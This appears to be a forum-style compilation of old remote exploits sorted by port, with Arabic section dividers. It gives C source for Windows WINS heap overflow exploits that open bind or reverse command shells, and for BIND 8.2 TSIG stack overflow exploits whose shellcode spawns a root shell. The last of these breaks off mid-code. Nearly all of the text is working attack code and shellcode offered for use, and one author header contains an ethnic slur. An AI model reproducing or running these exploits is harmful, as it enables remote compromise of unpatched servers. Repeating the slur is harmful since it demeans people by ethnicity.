int main(int argc, char *argv[])
{
int i,sock,sock2,sock3,addr,len=16;
int rc;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;
int cbport;
long cbip;
struct sockaddr_in mytcp;
struct hostent * hp;
if(argc<4 || argc>4)
usage();
cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);
char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
memcpy(mess3+le,rep,sizeof(rep)-1);
le+=sizeof(rep)-1;
}
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode) );
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);
addr = inet_addr(argv[1]);
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
//printf("socket() error...\n");
exit(-1);
}
mytcp.sin_addr.s_addr = addr;
mytcp.sin_family = AF_INET;
mytcp.sin_port=htons(42);
printf(" connecting the target\n");
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
sockaddr_in));
printf(" sending exploit\n");
send(sock,mess3,lenr,0);
printf(" exploit sent\n");
sleep(5);
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}
void usage()
{
unsigned int a;
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}
// [2004-12-31]
42 MS Windows (WINS) Remote Buffer Overflow Exploit (v.3)
/*
Windows Internet Name Service (WINS)
Remote Heap Buffer Overflow
------------------------------------
------------------------------------
Advisory credits:
----------------
Nicolas Waisman of Immunity Inc. (www.immunitysec.com)
Advisory link:
----------------
immunitysec.com/downloads/instantanea.pdf
Fix:
----------------
support.microsoft.com/kb/870763 (MS04-045)
Exploit method:
----------------
PEB (RtlEnterCriticalSection)
Tested Working:
----------------
Win2k SP4 Server ENGLISH (should be all langages, not sure)
Win2k SP4 Advanced Server ENGLISH (should be all langages, not sure)
(KB870763 removed!)
Note:
----------------
A HAT-SQUAD view on this hole; exploitable and remaining critic for Windows 2000.
May need update for Windows 2003 due to the different
structure of wins.exe in it but the bug remain exploitable
with no KB870763 of course....
If you look closely at my code , you will notice two overwrites,
this is the difference between Server <=> Advanced Server, with an
el8 pad, repair, you catch them both.
Greetings:
----------------
All guys at hat-squad and metasploit
also #n3ws at EFnet, useful to keep an eye on security.. (50 rsslinks)
and thanx you leku.
Update:
----------------
v0.2: runtime error fixed
v0.3: hardcoded repair, much decent and stable
v0.3: FreeBSD compilation fixed: gcc 101_WINS.cpp -o 101_WINS
-=[®class101.org]=-
*/
#include <stdio.h>
#include <string.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x 53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\x C3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x 30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x 50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\x F0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x 7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\x D3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\x D3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\x E4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x 4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\x DD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x 6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\x EE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x 6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\x DD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x 59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x 10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\x EA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x 44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\x E9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";
char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "\x20"
original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x 3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x 99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x 28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\x C0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x 68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x 68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x 5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\x F5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x 00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\x AA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x 63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\x AA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x 68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x 6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x 6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\x FF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";
char bug[]=
"\x00\x00\x07\xD0\x00\x00\xFF\x00\x05\x39\x1F\xBC\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90";
char payload[256],payload2[4096];
int tot;
char pad[]="\x00\x00\x00\x00",padB[]="\xEB\x07";
char ret1[]="\xFC\x20\x39\x05";
char ret1b[]="\x20\xF0\xFD\x7F";
char repair[]="\xC7\x05\x20\xF0\xFD\x7F\x60\x20\xF8\x77";
char sip[3],spo[1];
#ifdef WIN32
WSADATA wsadata;
#endif
void ver();
void usage(char* us);
void sl(int time);
int main(int argc,char *argv[])
{
ver();
int check1, check2;
unsigned long gip;
unsigned short gport;
char *what, *where, *os;
if (argc>6||argc<3||atoi(argv[1])>1||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5||strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6){if (strlen(argv[4])<7){usage(argv[0]);return -1;}}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x00000000;
gport=htons(atoi(argv[5]))^(short)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...\n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x00000000;
gport=htons(atoi(argv[5]))^(USHORT)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...\n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=42;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){what=ret1;where=ret1b;os="Win2k SP4 Server ENGLISH\n[+] Win2k SP4 Advanced Server ENGLISH\n";}
printf("[+] TARGET: %s\n",os);sl(1);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connection failed\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected\n");sl(1);
printf("[+] building the payload..\n");sl(1);
memset(payload,0x90,196);memcpy(payload+132,what,4 );memcpy(payload+136,where,4);
memcpy(&bug[84], what, 4);memcpy(&bug[88], where, 4);
memset(payload2,0x90,2100);
memcpy(payload2+252,padB,2);memcpy(payload2+52,pad B,2);
memcpy(payload2+263,repair,10);memcpy(payload2+63, repair,10);
if (argc==6)
{
memcpy(&scode2[167], &gip, 4);
memcpy(&scode2[173], &gport, 2);
memcpy(payload2+350,scode2,strlen(scode2));
}
else memcpy(payload2+350,scode1,strlen(scode1));
printf("[+] sh0uting the heap!\n");sl(1);
if (send(s,bug,sizeof(bug)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,pad,sizeof(pad)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,pad,sizeof(pad)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
if (send(s,payload2,strlen(payload2),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");return -1;}
sl(3);
tot=sizeof(bug)-1+(sizeof(pad)*2)-2+strlen(payload)+strlen(payload2);
printf("[+]\n[+] payload size: %d\n",tot);sl(1);
if (argc==6){printf("[+] payload sent, look at your listener, you should get a shell\n");}
else printf("[+] payload sent, use telnet %s:101 to get a shell\n",inet_ntoa(server.sin_addr));
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf(" \n");
printf(" [+] . 101_WINS.exe Target VulnIP (bind mode) \n");
printf(" [+] . 101_WINS.exe Target VulnIP VulnPORT (bind mode) \n");
printf(" [+] . 101_WINS.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode) \n");
printf("TARGETS: \n");
printf(" [+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
printf(" [+] 1. Win2k SP4 Advanced Server English (*) - v5.0.2195 \n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or \n");
printf(" reverse a cmdshell on your listener. \n");
printf(" A wildcard (*) mean tested working, else, supposed working. \n");
printf(" A symbol (-) mean all. \n");
printf(" Compilation msvc6, cygwin, Linux. \n");
printf(" \n");
return;
}
void ver()
{
printf(" \n");
printf(" ================================================== =[v0.3]====\n");
printf(" ============Windows Internet Name Service (WINS)=============\n");
printf(" ============Remote Heap Buffer Overflow Exploit==============\n");
printf(" ======coded by class101=============[Hat-Squad.com 2005]=====\n");
printf(" ================================================== ===========\n");
printf(" \n");
}
void sl(int time)
{
#ifdef WIN32
Sleep(time*1000);
#else
Sleep(time);
#endif
}
// [2005-04-12]
##########################################
انتهينا من بورت 42
##########################################
نبداْ بـ بورت 53
53 BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit
/*
* tsig0wn.c
* Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau
* [email protected]
* The author is not and will not be held responsible for the action of
* other people using this code.
* provided for informational purposes only
* since a greetz section is de rigeur
* greets to my luv scharnie, sheib, darkx, famzah, brainstorm, ghQst, robbot, ......
* a special **** to all pakis including those idiots from GForce, etc....
* but then pakistan is one big village comprising exclusively of prize idiots
* tabstop set at 3
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
/*
* This shellcode sux. cant ever get around to coding another one.
*/
char shellcode[] = {
0xeb,0x3b,0x5e,0x31,0xc0,0x31,0xdb,0xb0,0xa0,0x89,
0x34,0x06,0x8d,0x4e,0x07,0x88,0x19,0x41,0xb0,0xa4,
0x89,0x0c,0x06,0x8d,0x4e,0x0a,0x88,0x19,0x41,0xb0,
0xa8,0x89,0x0c,0x06,0x31,0xd2,0xb0,0xac,0x89,0x14,
0x06,0x89,0xf3,0x89,0xf1,0xb0,0xa0,0x01,0xc1,0xb0,
0x0b,0xcd,0x80,0x31,0xc0,0xb0,0x01,0x31,0xdb,0xcd,
0x80,0xe8,0xc0,0xff,0xff,0xff,0x2f,0x62,0x69,0x6e,
0x2f,0x73,0x68,0xff,0x2d,0x63,0xff,
0x2f,0x62,0x69,0x6e,0x2f,0x65,0x63,0x68,0x6f,0x20, 0x27,0x69,
0x6e,0x67,0x72,0x65,0x73,0x6c,0x6f,0x63,0x6b,0x20, 0x73,0x74,
0x72,0x65,0x61,0x6d,0x20,0x74,0x63,0x70,0x20,0x6e, 0x6f,0x77,
0x61,0x69,0x74,0x20,0x72,0x6f,0x6f,0x74,0x20,0x2f, 0x62,0x69,
0x6e,0x2f,0x62,0x61,0x73,0x68,0x20,0x62,0x61,0x73, 0x68,0x20,
0x20,0x2d,0x69,0x27,0x3e,0x2f,0x74,0x6d,0x70,0x2f, 0x2e,0x69,
0x6e,0x65,0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x3b, 0x20,0x2f,
0x75,0x73,0x72,0x2f,0x73,0x62,0x69,0x6e,0x2f,0x69, 0x6e,0x65,
0x74,0x64,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69, 0x6e,0x65,
0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x00,
};
#define NS_T_TSIG 250
#define SHELLCODE_OFFSET 13
#define DUMMY_ARG_OFFSET 176
#define ENUM_FILE 1 //eventlib_p.h line 141
struct {
char *system_name;
unsigned int buffer_start; /* the address where out buffer starts in memory */
unsigned int frame_pointer; /* content of the frame pointer */
int garbage_len; /* length of the garbage in which we will embed ebp|eip */
} system[] = {
{ "Test value 1", 0xbffff640, 0xbffff868, 326, },
{ "Test value 2", 0xbffff5f0, 0xbffff700, 326, },
{ "Slackware 7.0", 0xbffff590, 0xbffff7e8, 326, },
{ NULL, 0x0, 0x0, },
};
void usage (void);
void encode_dns_name (char *, int, int);
int
main (int argc, char *argv[])
{
char query[PACKETSZ]; // construct our query packet here
char *query_ptr; // pointer to walk the query buffer
HEADER *hdr_ptr; // pointer to the header part of the query buffer
int arg;
unsigned int buffer_start,
frame_pointer, // value the frame pointer will have
shellcode_addr; // address our shellcode will have in the named buffer calculated from buffer_start
int index;
char *target_name;
struct hostent *target_host;
struct sockaddr_in target;
int sockfd;
if (argc < 2)
usage ();
while ((arg = getopt (argc, argv, "b:f:s:")) != -1) {
switch (arg){
case 'b': sscanf (optarg, "%x", &buffer_start);
break;
case 'f': sscanf (optarg, "%x", &frame_pointer);
break;
case 's': index = atoi (optarg) - 1;
buffer_start = system[index].buffer_start;
frame_pointer = system[index].frame_pointer;
break;
default : usage ();
}
}
if (!(target_name = argv[optind])){
fprintf (stderr, "tsig0wn: abysmal m0r0n error\n");
exit (1);
}
/*
* Form a header.
*/
memset (query, 0, PACKETSZ);
// cud blow up on other architectures not as liberal as x86. an union like in the bind sources is the correct way to go.
hdr_ptr = (HEADER *)query;
hdr_ptr->id = htons (0x1234);
hdr_ptr->qr = 0;
hdr_ptr->opcode = 0;
hdr_ptr->qdcount = htons (2);
hdr_ptr->arcount = htons (1);
/*
* Form a query after the header where we put in the shellcode
*/
query_ptr = (char *) (hdr_ptr + 1);
memcpy (query_ptr, shellcode, strlen (shellcode)+1);
query_ptr += strlen (shellcode) + 1;
PUTSHORT (T_A, query_ptr);
PUTSHORT (C_IN, query_ptr);
/*
* we form another header here that contains garbage with embedded stuff
* i cud have put this in the same header as the shellcode and have the
* shellcode nullify. (shrug)
*/
{
char *tmp;
unsigned long dummy_argument = buffer_start+DUMMY_ARG_OFFSET;
frame_pointer &= 0xffffff00; // zero out the LSB like the overflow in ns_sign will do
// this will make layout a domain name for the second query, within which
// we will embed our ebp | eip
encode_dns_name (query_ptr, system[index].garbage_len, (frame_pointer - buffer_start) - (query_ptr - query));
query_ptr += system[index].garbage_len;
shellcode_addr = buffer_start + SHELLCODE_OFFSET;
printf ("buffer starts at address = 0x%x\n", buffer_start);
printf ("saved frame pointer after overwrite = 0x%x\n", frame_pointer);
printf ("shellcode will reside at address = 0x%x\n", shellcode_addr);
printf ("dummy argument will reside at address = 0x%x\n", dummy_argument);
// put in the type member of evEvent_p. File is what we need
tmp = query + DUMMY_ARG_OFFSET;
tmp[0] = ENUM_FILE;
tmp[1] = ENUM_FILE >> 8;
tmp[2] = ENUM_FILE >> 16;
tmp[3] = ENUM_FILE >> 24;
// embed the addresses. These will be interpreted as ebp and eip.
// we put the address where our shellcode will be situated twice.
// we overflow the saved frame pointer of datagram_read(). when the
// function returns to __evDispatch() it calls __evDrop().
// because we have shifted the frame pointer and thus __evDispatch()
// notion of the stack we also provide two pointers as arguments to
// __evDispatch. These pointers point to the start of this query header
// name, within which __evDrop will look for evEvent_p->type. we set
// type to be of type 'file' above which causes it to break and execute
// FREE() which in turn calls free().
tmp = query + (frame_pointer - buffer_start); // advance the ptr to the place where we put in our ebp|eip
tmp[0] = shellcode_addr;
tmp[1] = shellcode_addr >> 8;
tmp[2] = shellcode_addr >> 16;
tmp[3] = shellcode_addr >> 24;
tmp[4] = shellcode_addr;
tmp[5] = shellcode_addr >> 8;
tmp[6] = shellcode_addr >> 16;
tmp[7] = shellcode_addr >> 24;
tmp[8] = dummy_argument;
tmp[9] = dummy_argument >> 8;
tmp[10] = dummy_argument >> 16;
tmp[11] = dummy_argument >> 24;
tmp[12] = dummy_argument;
tmp[13] = dummy_argument >> 8;
tmp[14] = dummy_argument >> 16;
tmp[15] = dummy_argument >> 24;
}
PUTSHORT (T_A, query_ptr);
PUTSHORT (C_IN, query_ptr);
/*
* Additional section containing T_SIG stuff
*/
// a name with only one char
memcpy (query_ptr, "\x01m\x00", 3);
query_ptr+=3;
PUTSHORT (NS_T_TSIG, query_ptr);
PUTSHORT (C_IN, query_ptr);
// these members wont be checked at all as find_key returns NULL on testing secretkey_info.
// PUTLONG (0, query_ptr);
// PUTSHORT (0, query_ptr);
/*
* Connect and deliver the payload
*/
if (!(target_host = gethostbyname (target_name))){
fprintf (stderr, "host name resolution error for %s: %s\n", target_name, hstrerror (h_errno));
exit (1);
}
if ((sockfd = socket (PF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0){
perror ("socket");
exit (1);
}
memset (&target, 0, sizeof (target));
target.sin_family = AF_INET;
target.sin_port = htons (53);
target.sin_addr.s_addr = ((struct in_addr *)target_host->h_addr_list[0])->s_addr;
if (connect (sockfd, &target, sizeof (target)) < 0){
perror ("connect");
exit (1);
}
if (send (sockfd, query, query_ptr - query, 0) < 0){
perror ("send");
exit (1);
}
exit (0);
}
void
usage (void)
{
int i;
fprintf (stderr, " tsig0wn\n");
fprintf (stderr, "Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau\n");
fprintf (stderr, "\nAvailable System Types\n");
for (i = 0; system[i].system_name; i++)
fprintf (stderr, "%d. %s\n", i+1, system[i].system_name);
fprintf (stderr, "\nUsage:\n");
fprintf (stderr, "tsig0wn [ -s system type ] target\nor\n");
fprintf (stderr, "tsig0wn [ -b buffer start address ] [ -f frame pointer content ] target\n");
exit (1);
}
/*
* a pretty convoluted function.
* len is the number of octects to fill in (including the length octect)
* embed_pos is the position where we need to embed this |len|ebp|eip|.
* Hopefully when we overwrite the saved ebp on the stack
* we expect it to point here and take the eip (which in turn points to our
* shellcode) from here. The challenge here is to lay out the octets so
* that it doesnt clash with embed_pos.
*/
void
encode_dns_name (char *buf, int len, int embed_pos)
{
int ctr = 0;
int adjusted = 0;
embed_pos -= 2; // our ebp | eip needs the length octet before it, so adjust for it now + 1
len--; // for the NULL octet at the end.
// sanity check
if (embed_pos >= len){
fprintf (stderr, "encode_dns_name: embed_pos >= len\n");
exit (1);
}
while (ctr < len)
// max 63 octets allowed + preceding 1 octet for length
if (ctr+64 <= len){ // enough space for another 63+1
if (ctr+64 <= embed_pos || adjusted){ // embed_pos not in between
*buf++ = 63;
memset (buf, 'g', 63); buf += 63;
ctr+=64;
}
else { // need to adjust cuz embed_pos in between
*buf++ = embed_pos-ctr-1;
memset (buf, 'o', embed_pos-ctr-1); buf += embed_pos-ctr-1;
ctr+= embed_pos-ctr;
adjusted++;
}
}
else {
if (len - ctr <= embed_pos || adjusted){ // only remaining len - ctr
*buf++ = len-ctr-1;
memset (buf, 'g', len-ctr-1);
ctr += 63; // we are quitting anyway after this. no need to update ctrs
}
else{
*buf++ = embed_pos-len-ctr-1;
memset (buf, 'o', embed_pos-len-ctr-1); buf += embed_pos-len-ctr-1;
ctr += embed_pos-len-ctr;
adjusted++;
}
}
*buf=0x00; // finish with a 0
}
// [2001-03-01]
53 BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (2)
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## bind 8.2 8.2.1 8.2.2 8.2.2-PX Slackware 4.0/RedHat 6.2 #*/
/* The code establishes a TCP connection with port 53 of a target system. */
/* It makes use of the "infoleak" bug (through UDP) to obtain the base */
/* value of the named process frame stack pointer, which is later used */
/* for constructing proper DNS tsig exploit packet. */
/* */
/* Upon successful exploitation the assembly routine gets executed. It */
/* walks the descriptor table of the exploited named process in a search */
/* for the socket descriptor of the previously established TCP connection. */
/* Found descriptor is duplicated on stdin, stdout and stderr and /bin/sh */
/* is spawned. */
/* */
/* The use of such an assembly routine allows successfull exploitation of */
/* the vulnerability in the case when vulnerable dns servers are protected */
/* by tightly configured firewall systems (with only 53 tcp/udp port open). */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
char msg[]={
0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x01,0x20,0x20,0x20,0x20,0x02,0x61
};
char asmcode[]=
"\x3f" /* label len 63 */
"\x90\x90\x90" /* padding */
"\xeb\x3b" /* jmp <asmcode+65> */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x5f" /* popl %edi */
"\x83\xef\x7c" /* sub $0x7c,%edi */
"\x8d\x77\x10" /* leal 0x10(%edi),%esi */
"\x89\x77\x04" /* movl %esi,0x4(%edi) */
"\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */
"\x89\x4f\x08" /* movl %ecx,0x8(%edi) */
"\xb3\x10" /* movb $0x10,%bl */
"\x89\x19" /* movl %ebx,(%ecx) */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\xff" /* movb $0xff,%cl */
"\x89\x0f" /* movl %ecx,(%edi) */
"\x51" /* pushl %ecx */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x07" /* movb $0x7,%bl */
"\x89\xf9" /* movl %edi,%ecx */
"\xcd\x80" /* int $0x80 */
"\x59" /* popl %ecx */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x39\xd8" /* cmpl %ebx,%eax */
"\x75\x0a" /* jne <asmcode+62> */
"\x66\xbb\x12\x34" /* movw $0x1234,%bx */
"\x66\x39\x5e\x02" /* cmpw %bx,0x2(%esi) */
"\x74\x08" /* je <asmcode+70> */
"\xe2\xe0" /* loop <asmcode+32> */
"\x3f" /* label len 63 */
"\xe8\xc0\xff\xff\xff" /* call <asmcode+6> */
"\x89\xcb" /* movl %ecx,%ebx */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x03" /* movb $0x03,%cl */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x3f" /* movb $0x3f,%al */
"\x49" /* decl %ecx */
"\xcd\x80" /* int $0x80 */
"\x41" /* incl %ecx */
"\xe2\xf6" /* loop <asmcode+76> */
"\xeb\x14" /* jmp <asmcode+108> */
"\x31\xc0" /* xorl %eax,%eax */
"\x5b" /* popl %ebx */
"\x8d\x4b\x14" /* leal 0x14(%ebx),%ecx */
"\x89\x19" /* movl %ebx,(%ecx) */
"\x89\x43\x18" /* movl %eax,0x18(%ebx) */
"\x88\x43\x07" /* movb %al,0x7(%ebx) */
"\x31\xd2" /* xorl %edx,%edx */
"\xb0\x0b" /* movb $0xb,%al */
"\xcd\x80" /* int $0x80 */
"\xe8\xe7\xff\xff\xff" /* call <asmcode+88> */
"/bin/sh"
"\x90\x90\x90\x90" /* padding */
"\x90\x90\x90\x90"
;
int rev(int a){
int i=1;
if((*(char*)&i)) return(a);
return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}
int main(int argc,char **argv){
char buffer[1024],*b;
int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/\n");
printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86\n\n");
if(argc<2){
printf("usage: %s address [-s][-e]\n",argv[0]);
printf(" -s send infoleak packet\n");
printf(" -e send exploit packet\n");
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"se"))!=-1){
switch(c){
case 's': flag=1;break;
case 'e': flag=2;
}
}
if(flag==-1) exit(-1);
adr.sin_family=AF_INET;
